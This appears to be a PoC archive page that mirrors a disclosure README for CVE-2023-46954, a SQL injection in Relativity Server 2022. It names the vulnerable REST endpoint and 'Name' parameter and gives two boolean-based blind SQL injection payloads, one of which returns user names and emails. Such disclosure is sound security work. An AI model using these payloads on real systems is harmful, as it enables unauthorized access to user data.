Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-46954 PoC — Relativity ODA LLC RelativityOne 安全漏洞

Source
Associated Vulnerability
Title:Relativity ODA LLC RelativityOne 安全漏洞 (CVE-2023-46954)
Description:SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.
Readme
# CVE-2023-46954

> SQL Injection vulnerability in Relativity Server 2022
> v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute
> arbitrary code via the name parameter.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Relativity ODA LLC
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Relativity Server 2022 v.12.1.537.3 Patch 2 and earlier
>
> ------------------------------------------
>
> [Affected Component]
> POST /Relativity.Rest/API/Relativity.Users/workspace/<id>/users/retrieveusersby
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Within the JSON POST parameter 'Name', the following payload will return true and display a list of names and emails:
>
> (SELECT (CASE WHEN (1=1) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
>
> But the following payload will return false and display the message 'SQL Statement Failed':
>
> (SELECT (CASE WHEN (1=2) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
>
> Note: the True/False comparison takes place within the CASE WHEN (<here>) clause.
>
> ------------------------------------------
>
> [Reference]
> https://www.linkedin.com/in/jakedmurphy1/
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Jake Murphy
File Snapshot

[4.0K] /data/pocs/8815d9d7ae91398379e3e0a341bfbe11f2361e75 └── [1.6K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →